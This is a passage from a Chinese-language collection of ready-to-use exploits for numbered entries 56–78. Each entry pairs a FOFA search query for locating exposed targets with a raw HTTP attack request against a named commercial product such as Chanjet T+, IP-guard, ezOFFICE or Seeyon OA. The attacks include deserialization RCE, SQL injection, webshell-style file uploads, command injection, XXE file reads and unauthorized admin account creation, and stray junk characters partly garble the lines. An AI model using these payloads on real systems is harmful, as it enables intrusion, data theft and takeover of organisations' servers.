. {* p7 r  \! R2 A6 @& {; q/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
5 i0 r( f5 C3 M$ C4 c1 c  [/ N! \, \6 k5 @1 k7 s6 ^
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ m7 U; @7 R6 `5 [2 A( k
FOFA: app="畅捷通-TPlus"6 r. \( {3 u& O5 t, T' y
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
4 L' U+ y" [6 eHost: x.x.x.x
+ ?  n3 Y0 u9 Z1 L5 I% r9 O' D( ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36! G! A8 n4 N; f2 e7 D
Content-Type: application/json
" l1 w* J( W* P6 L$ ^# P! X( Z4 V2 L$ _' ^9 O- b3 j2 f! ~/ ]
{
9 p& p; c7 _  p/ h+ t7 t0 u3 ^$ J0 S  "storeID":{
) q( O+ k. X9 m- T6 W- n  X3 z6 [    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 A0 t, z' r% ?" i2 C5 h6 I0 z
   "MethodName":"Start",
) @+ }" T" ], m. p/ o$ {# Z    "ObjectInstance":{
% s1 S2 I0 l" i& p       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( [$ L* h$ c$ n% g" Z        "StartInfo": {
9 d  c8 L" W  O- H9 L: F           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. M5 n* Y; s5 {: `9 A
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
* s; |0 x; z9 X: ~5 ~6 v2 d' `+ e* k       }
( a. m- B3 h, N( _/ _$ a6 B    }$ j- r5 ?" R  C& u( }$ \, ]: s1 B
  }; i) _0 m4 O$ n3 R+ ^
}0 _) }  O) o* {# m$ s6 S
6 `/ Z2 s# }2 f) b" Z

4 U& s& j4 c9 X0 \* m: {3 S: C8 D# \  w+ S57. 畅捷通T+ keyEdit.aspx SQL注入
# T: \+ J. m9 d: qFOFA:app="畅捷通-TPlus"# `7 R* k' D& C- i/ D
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
9 y) |& V6 V4 Y- B/ \$ HHost: host7 u- B7 a/ D8 N9 o5 V8 g2 V
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ k* @+ C* U2 U; z; l) R4 r
Accept-Charset: utf-8
3 a# E. h+ \$ h' LAccept-Encoding: gzip, deflate: G7 t( t) u3 A2 a2 Y
Connection: close
2 {! s) R5 j' z2 r1 `% Y  a5 ]4 _

# y. c: G- q' H; U# R5 b- M3 l2 v/ a58. 畅捷通T+ KeyInfoList.aspx sql注入: m$ q  c9 [$ G
FOFA:app="畅捷通-TPlus"- n: g/ X' t+ ]6 Z. G. \
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
- u  v$ D4 ^1 }0 ]$ f# J7 yHost: your-ip
) S" t7 {$ {$ ^! r& k: wUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 M$ Q: x' ~& j+ n9 ]  q( vAccept-Charset: utf-8) e; r$ K0 y# _. a0 m6 X. ?
Accept-Encoding: gzip, deflate
& }0 ]- \0 B# q$ C6 xConnection: close
6 f" S9 {& {  H) Y9 N# f5 _- X, e4 N0 A# l* D

. o! d: d- ~' f, ?6 R$ t59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 d6 d7 O' H2 @. h* ]9 \4 C2 `
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"" V4 q$ _4 [# M; v/ U2 w" a( x
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1- y6 y' D# U3 c% V: _+ c3 G' E4 B/ n
Host: 192.168.86.128:9090
. I1 ~" v2 Q2 d* C8 MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% `. |' e7 J- V6 f9 K0 dConnection: close
* G6 }0 Q. E, z1 }0 i+ RContent-Length: 1669
2 E( ^/ [" |, n% d3 F# gAccept: */*
+ f6 M* {3 P3 N$ WAccept-Language: en
1 @3 u; U# z2 R2 n2 r* nContent-Type: application/x-www-form-urlencoded9 L+ ^$ N9 R" d2 ]0 U, i' C
Accept-Encoding: gzip
+ ?. ^# X/ A0 H
, F4 d! Q& s9 DPAYLOAD
& b; A0 Q8 t: i* H; Q
7 G9 q4 V" ]5 N1 ]! e$ d
& C6 f& f& A& J  s" M! K, f& w60. 百卓Smart管理平台 importexport.php SQL注入" }; m- g6 {% p; X8 |; f
FOFA:title="Smart管理平台"
, Y# v0 i, b, L# O, n' t# Q, [1 `GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1# ]% D9 @) g; A, J: E6 y
Host:& Q$ w1 w; q4 }: D. {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, T) E; K2 H; T- n! m2 m! \; }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" R" u) G0 I" H" a  m6 \+ z3 D# P
Accept-Encoding: gzip, deflate. W7 ^, I9 J& [9 H8 a+ x
Accept-Language: zh-CN,zh;q=0.9$ R  V5 f) K& k) v6 v5 I
Connection: close
/ ]# l6 q0 R# m+ j; P
- ~9 D0 ~1 I1 U% M4 _9 J
* `6 T( k( |* A* d% R. j61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
: ?0 b' o; M" c0 B& S$ }  CFOFA: title="欢迎使用浙大恩特客户资源管理系统"
7 F5 _" d- Z9 F% ]5 K2 kPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
8 a1 Z- I: N4 q) Q( T  v1 IHost: x.x.x.x
( C3 V& S  z2 G4 ]. zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. K0 d1 L8 d& D( Q/ YConnection: close
* \3 j' [# K& U2 L; M; m; m  MContent-Length: 27- C6 a5 v4 X3 {& d/ P5 p" p! G. w
Accept: */*7 ~4 @' J* N1 ^+ J/ {& o7 L: u( }) O
Accept-Encoding: gzip, deflate1 n9 `: O! O) X9 H$ L" K  h* X7 a% M
Accept-Language: en8 Q: W& w" E3 P0 Y& b9 X
Content-Type: application/x-www-form-urlencoded
: |" P* o. W( X* R; _6 P4 e
+ }. E. T( S; u8uxssX66eqrqtKObcVa0kid98xa
5 ?; b2 B4 k9 e: l+ v+ G* V& F1 K% f$ b- |4 h; k+ j" ?3 I

% I  O' l/ J8 k62. IP-guard WebServer 远程命令执行. n2 M, ~8 Q' P/ z/ \
FOFA:"IP-guard" && icon_hash="2030860561") }$ c( E! F5 f2 `* O
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
& x4 M# c  N0 \0 ZHost: x.x.x.x
+ S; y, o' K* @/ M, D- c: aUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
! O, @! M: _3 z( B$ u# uConnection: close
4 z4 d' A  U( {" ]. wAccept: */*, P9 u0 s0 H! u  |% M" a
Accept-Language: en
2 P: `/ y: P+ g' aAccept-Encoding: gzip
) ]8 x8 k1 H9 u  }# v, P' ^
" F" h. a: }2 }& q! p! Z+ s9 z9 Q% r+ k. q3 ]. w$ l  R
访问
. T; J/ ]! f% T" y
1 C/ f5 K- C( K* Z- W1 O2 gGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1; \% |) m! u. `! ~
Host: x.x.x.x
6 ]: S! \, k+ L7 @8 d
; l% }, |: i' N+ S; v. B  Q; k" h2 n
63. IP-guard WebServer任意文件读取
1 E3 ^4 H# w% n# Y' D' t+ W2 P6 DIP-guard < 4.82.0609.0- ]" a2 O7 O! q! |9 \4 V6 e4 p
FOFA:icon_hash="2030860561"" _2 a% d% ]+ u3 _9 K
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 d# z! G8 A; P. t' I1 DHost: your-ip) w% I8 S7 l% ^. q/ y# v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.366 J# O* s0 T6 d; j$ K! U0 [1 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  ]* I7 t5 U' y2 j2 h* I6 e8 ?
Accept-Encoding: gzip, deflate, l9 i, H+ I( U4 U( |2 k: ]( W  i: g% m, ~
Accept-Language: zh-CN,zh;q=0.99 s' B9 L% H% V
Connection: close; z( A/ r/ N( ~( x* m0 s3 U
Content-Type: application/x-www-form-urlencoded, w: C- S. e; [
& u8 a0 {2 y# T2 T- l1 U  [' {; V9 m
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A. ]# N* H: s8 `; p) ]: w

. r5 _" o1 ]# k9 b9 \64. 捷诚管理信息系统CWSFinanceCommon SQL注入. l2 [" w4 o- e; W7 m+ V; l, I
FOFA:body="/Scripts/EnjoyMsg.js"
: H+ p1 V1 T6 ]' hPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
! Y( L/ A% }7 O) c' b9 s/ dHost: 192.168.86.128:9001
0 k, j" j* Y" R3 \- cUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36& e( r) h& I1 L" u( Y8 o% ]/ I
Connection: close
- }1 ], W7 P4 R' gContent-Length: 369
( E8 s' V# }* M1 jAccept: */*
. v3 e1 Q- ]1 C& @4 Z+ lAccept-Language: en+ M, u& |9 I1 I% c% W. d: q% M$ j
Content-Type: text/xml; charset=utf-8
' Z. E2 u' x: ]2 Q, BAccept-Encoding: gzip  X& q- Y0 i8 C: M" l2 l

( |' r0 T) V: k0 {& X1 Y5 R$ G<?xml version="1.0" encoding="utf-8"?>
3 B1 G1 r4 p3 J1 a" ]& ?0 E0 {( q<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ T" D' e9 A! \+ G7 |+ A) _<soap:Body>
0 M& A( d# Y5 u1 A; V8 l" _    <GetOSpById xmlns="http://tempuri.org/">+ y# L# h& y  [
      <sId>1';waitfor delay '0:0:5'--+</sId>1 t2 b# ]2 A. O
    </GetOSpById># y8 o6 g/ W5 p- v
  </soap:Body>- f  _. p0 O: {% K6 Y6 r
</soap:Envelope>; l# S0 L7 l" o9 r4 O( ?5 w
4 R, s/ |6 V+ ^# U5 L2 Y9 n& f( G

+ ~7 Q2 g4 u; {4 D3 ?; I8 I65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' A) D2 c. N* F) B3 k* O
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
8 f6 H  W7 H( z. ?+ |% [- ~5 S' p* P响应200即成功创建账号test123456/123456- L) ^/ \+ D$ a  s4 ]
POST /SystemMng.ashx HTTP/1.1
. d9 Q4 [) C( U5 n$ s5 UHost:/ J& s9 w! a- [9 P
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
7 |8 x5 f* S- `6 b. v2 YAccept-Encoding: gzip, deflate
% f9 e: i3 a; P5 NAccept: */*
. L  ^- R, Z1 W, B+ }( U; XConnection: close4 a8 m0 F* [6 C7 H$ \
Accept-Language: en
' z5 u; S4 {) |9 I, W# V. x/ jContent-Length: 174
4 B* b) u, l6 r' w3 O
8 h! i# Q; Q5 f/ E" l) x: O" NoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
3 |4 h" @8 Y+ w
/ K: Y) I* ?0 C" x$ F# p
2 u" m( V! Z8 z; a8 S66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
' }  Y6 r4 v' g3 V1 CFOFA:app="万户ezOFFICE协同管理平台". H# u9 J2 `, V* }& E; e

6 _+ t2 T! S$ N1 d0 f* UGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
$ U5 l1 x3 O' E2 }, p, ]/ z; ]Host: x.x.x.x4 l$ V7 S! J! U/ W; q: }. {8 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.364 M, `3 i$ w' \+ w7 l% v) w
Connection: close
: {& r5 ~9 g& E5 X3 dAccept: */*" T+ A8 I/ v# Z
Accept-Language: en- k# A. n: k5 t* t+ N
Accept-Encoding: gzip
0 Z) K" T! J8 C% @
) u) Q) M9 _# t$ o! }0 h$ w+ A
" X: c0 }/ |. k) Q4 g' [第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
% Z: @7 ?* F" [& e
1 A* P9 m) o" ?7 Q. C. j67. 万户ezOFFICE wpsservlet任意文件上传
/ u8 n9 Y6 Q# x9 uFOFA:app="万户网络-ezOFFICE"( d, r9 S5 K0 Z9 g8 ]# `$ w
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型  U2 E4 R+ e, a& g- |0 l+ z7 ]
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
& e* {0 |- g7 }1 n3 F" QHost: x.x.x.x, A9 E+ q0 m4 k6 B4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
2 ~( j8 o1 X& U( @Content-Length: 173
+ E- i; U: P' d/ r) c8 e( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5 ], z2 g  z. X& u) D; p9 ~% d+ @2 YAccept-Encoding: gzip, deflate
) E1 i9 @' U7 B" f  C7 uAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- R3 ~5 o6 y* }/ F3 D2 WConnection: close" e- G) B$ E& w
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp& N4 f7 ^  L4 D9 n& P# v% f7 L3 i
DNT: 1
" D2 \" x4 O  L2 ZUpgrade-Insecure-Requests: 1
- {& G8 i$ r8 p3 Y+ b4 {  V2 I4 E; q! w" T! m5 I
--ufuadpxathqvxfqnuyuqaozvseiueerp
4 @: _) I1 t6 N0 yContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
2 L- T+ J, q4 C/ N4 K4 |: V/ x& M+ y3 p1 B: G6 i$ [
<% out.print("sasdfghjkj");%>+ X, ]" ?8 H3 q
--ufuadpxathqvxfqnuyuqaozvseiueerp--7 u2 T' ^) q) a3 J2 W( }& A

% E: {6 J2 M, ^) Z: ^; a! S* K7 u$ C
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
( A. s9 U$ d. P- D  _- k* h% }) H  k5 K1 m0 \2 q9 R- b, X
68. 万户ezOFFICE wf_printnum.jsp SQL注入/ p7 A* X" O$ F6 k7 V) _, h6 y
FOFA:app="万户ezOFFICE协同管理平台"1 j$ p% o& t1 m
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 t$ y% ^' ]  p
Host: {{host}}' A' {! e# `8 \3 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
8 M, _9 S5 c2 x/ wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- H% @& [+ S$ }0 H% R! L/ S
Accept-Encoding: gzip, deflate% Z& D; [% m7 f! J' q
Accept-Language: zh-CN,zh;q=0.9" |. J/ s) {- ~, Q& ^2 f( y
Connection: close
' c/ r3 Z5 W7 _9 k
* J- w2 F  f4 B( x  W
; }( V4 L& X+ K0 }69. 万户 ezOFFICE contract_gd.jsp SQL注入$ [5 c9 k4 n! A# C
FOFA:app="万户ezOFFICE协同管理平台", P" d4 H* `( v, \7 Q+ J6 \
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.10 W+ D* O9 ~& M1 ?  ^  g6 Y, ?" M
Host: your-ip" b& R$ Q3 W. v& w9 w
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 s* r, ?+ X$ |* a
Accept-Encoding: gzip, deflate, G4 ~5 C  C0 ]
Accept: */*
$ u  e  M6 [# I* fConnection: keep-alive5 ^- l! `6 X  o" f1 Y
- H, r' a# m" ?* N7 q! c/ ^# _4 m  L! F
; D1 Y# o- @! B/ `; M
70. 万户ezEIP success 命令执行/ _6 v  ?% b: p8 s" I* G, I1 t
FOFA:app="万户网络-ezEIP"; o% G. B6 {# J
POST /member/success.aspx HTTP/1.1) x1 @- C( v& ]# P0 \: X* V# A
Host: {{Hostname}}& ~; C8 g6 X" A. ^4 M7 S6 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 K( `& I6 ~  r6 L. e
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, r1 g$ J/ X+ r: h* _' @
Content-Type: application/x-www-form-urlencoded/ W0 ]4 ~9 N0 }, G6 y3 [( ^* a5 d
TYPE: C
$ N' o+ ?$ o3 E; ^# T& c" I' wContent-Length: 16702
8 Z9 b, T9 c3 x$ B3 T' t/ L6 Y3 g3 O; I. g
__VIEWSTATE=PAYLOAD7 n  e# G& O. ?* O

. a2 E! i( a' V+ g  H4 n& U. ]5 m5 Y! z- I
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 M; P) l$ j8 h  L4 K  {& {- h! |
FOFA:body="PM2项目管理系统BS版增强工具.zip"& N2 z& [9 w) Q* Y1 ^1 p2 u9 f
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1+ h6 s& v+ W6 f; j& L0 A
Host: x.x.x.xx.x.x.x
9 n# @7 ]) k) Z7 w  |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& \" `. T8 x+ B$ ~! iConnection: close. ^% n' C  c& Q" z1 s# H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 X8 _7 N0 W9 v4 i9 g. N
Accept-Encoding: gzip, deflate
" q2 v; J5 P9 S1 ?; l+ X2 p& p" b' U3 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( Z* _; b: Z' ~' _% h  |( s2 Z4 qUpgrade-Insecure-Requests: 19 H# B% }% g( o% `! P( a& B0 d5 A) N

4 {+ ?* X/ t: Y5 k5 E" A+ o
% a( \7 I9 \. [( }5 T9 m72. 致远OA getAjaxDataServlet XXE
: |3 n. a8 v6 {6 NFOFA:app="致远互联-OA"1 t4 y3 @. K4 C2 ^  v  _' w0 j% R# R
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
3 V8 ?2 t' t1 B8 iHost: 192.168.40.131:8099
8 o6 B- e) N5 t3 ]9 JUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36, O6 Z4 h7 f  m1 x6 ~& d
Connection: close
* k1 X7 X1 K$ d" t5 dContent-Length: 5839 X# Z6 @; S4 w/ ^! i9 _6 P, d, e
Content-Type: application/x-www-form-urlencoded
+ J% U( k8 |* o9 f/ d8 A- H3 {1 oAccept-Encoding: gzip
$ i  M0 I1 E2 ]! k9 ]* Y; l: v( L
/ ?& F. p/ m  h8 d- A8 \S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E! \6 U- T* j+ j7 q$ e# a& }

/ [* E& |; Y  W6 O! }4 j! k. v& s7 x& W4 N( [9 S
73. GeoServer wms远程代码执行, g( W  T5 F& P% Z* g( v! B
FOFA:icon_hash=”97540678”0 A% n6 [3 m$ Y2 R( k6 K2 I
POST /geoserver/wms HTTP/1.1/ N1 T' q: Q4 {/ q
Host:
7 h3 L( S- \( W0 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 p* Y" L# r4 C: Z5 A1 y
Content-Length: 1981
% c. M6 N. ~) k: t! E1 MAccept-Encoding: gzip, deflate2 v. b; O) z3 t5 Y
Connection: close8 P2 U/ H8 Z( p, \
Content-Type: application/xml- l8 o( X' m, z4 l5 k( ^9 F
SL-CE-SUID: 3& C! x3 u9 O$ m! x/ T; L2 }% V
; o" b1 |; R8 Q" V8 I: H
PAYLOAD0 @# m1 Q4 S( q& F* {
0 |8 K( \2 q; j
' Y1 c4 g" |# t* j
74. 致远M3-server 6_1sp1 反序列化RCE
1 Y3 I, e$ ?# |FOFA:title="M3-Server"" I6 `: k0 V. B; b5 r
PAYLOAD- o/ ^  {* z0 G" C7 Z7 O

7 N, y( B6 s- X: I75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; L$ d* ?6 |8 Q) d) pFOFA:app="TELESQUARE-TLR-2005KSH"
1 J% ]" i9 f8 U1 _GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1$ q% R3 S* V: |; |8 ]8 L# d
Host: x.x.x.x
5 x" {& b4 b, @7 Y' bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) F7 v1 h: R$ ?8 h: \
Connection: close' E/ m- O- E8 R% ?0 o8 d
Accept: */*
) V) S+ V; I1 C) bAccept-Language: en% [1 q) _+ `, c9 S/ c  e/ F
Accept-Encoding: gzip
2 f7 g2 N; m5 L$ R
  k5 A. f3 e% I' V2 B2 Y6 p$ \7 y* [6 ]9 f
GET /cgi-bin/test28256.txt HTTP/1.19 e! u2 g; s5 @9 U& T1 }3 s
Host: x.x.x.x. T$ B  I, y3 Z1 v; e

7 [, L, [/ ]8 P2 ~1 M* c) o9 G- O5 F" }
76. 新开普掌上校园服务管理平台service.action远程命令执行7 X3 S( G# ]2 R' Y; O2 A' V
FOFA:title="掌上校园服务管理平台"- y' O! K- p! Z
POST /service_transport/service.action HTTP/1.1* Y4 P* D, b* q
Host: x.x.x.x
( ~5 g. I& A5 g. [  M$ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 J" s8 W$ S3 I  b
Connection: close
2 [& V8 S5 ~) z: fContent-Length: 211
; X% V* ~2 {# q/ @9 Q: f& dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 _/ x' y' n$ u9 u; A2 v/ b6 l
Accept-Encoding: gzip, deflate5 a7 ^0 j2 O, F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 ~- X, N1 j! n9 [! d9 U3 @" N* |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
8 F' y; o7 u" t; H( qUpgrade-Insecure-Requests: 13 X3 `. v/ J  _) m

4 C. q3 a) D! O{
+ e* P* n0 Y9 Y"command": "GetFZinfo",
/ L. M" V4 w( _, f: e7 y* I  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"0 v  ~0 U) ~1 A: C% |2 E4 m% W/ {
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"1 z, Z3 S7 _6 `8 K' E, d
}
0 t/ _' S6 o! f- {' Q5 `, J, M% z( b

# V7 `# l' s( G  v! `% ^$ ^GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
4 A7 ^, u; P" V$ O+ A! {( HHost: x.x.x.x. y* a5 r& w2 G/ {

5 |& ^+ I' o: f# _- b$ W) K
/ V- s3 r2 \! i  g! {7 j( p% p% [9 s) F/ ?( z2 D
77. F22服装管理软件系统UploadHandler.ashx任意文件上传9 d3 _7 a5 ?2 c2 ~; y$ H; N
FOFA:body="F22WEB登陆"6 m, `* B: `: x/ E* E
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
* p4 Y7 d/ w4 _1 WHost: x.x.x.x
4 S+ u0 @# b' f: @8 f; hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ C3 ?1 F3 c6 A, h2 kConnection: close% p4 ^+ V) D8 Y; \0 e4 d
Content-Length: 4338 d( U! ^7 ]: c
Accept: */*7 I; h/ ]( p( k
Accept-Encoding: gzip, deflate" @3 N* L  W5 j7 p. }
Accept-Language: zh-CN,zh;q=0.9" S- p$ f  E( x
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
' O) A  H$ y: G" q8 ?( W8 x0 Z
  X# a( X# _1 ~; ?6 R$ W' H------------398jnjVTTlDVXHlE7yYnfwBoix
% @  {+ H( M, |3 wContent-Disposition: form-data; name="folder", `0 I* y$ t9 A8 e) a  b" {
! F  R/ ~) ]! [7 V8 r
/upload/udplog  ^8 |7 V, _2 N7 j8 \8 J+ |0 n
------------398jnjVTTlDVXHlE7yYnfwBoix
: j& b1 ]- D2 w* u6 ~Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 B* D1 N' M3 ~Content-Type: application/octet-stream
( D  f# @7 q5 G9 e0 U9 S; ?
# w+ x# v$ o( [1 b5 Thello1234567& d( W7 ~9 I  ~+ x3 [9 B* y
------------398jnjVTTlDVXHlE7yYnfwBoix
0 }2 ]/ c4 Z1 U" Y& p0 G$ t1 FContent-Disposition: form-data; name="Upload"
7 q7 k7 g- S6 z6 {" x! p+ d- S0 {! ^) T* z; `2 m/ B$ w
Submit Query
3 c, d3 d8 g. i8 q5 }------------398jnjVTTlDVXHlE7yYnfwBoix--
' j8 [  ?4 N9 ?; K' f- N; n) Z. `& u
: g; y1 |- ?2 s* V, m* A* b
" d$ B9 D0 K& u" ^/ B7 v78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
" j6 A" g% ]( \* N3 H5 M1 r( K. k2 ^FOFA:icon_hash="2001627082"
: y0 h- K( h' k; \7 \% YPOST /Platform/System/FileUpload.ashx HTTP/1.1
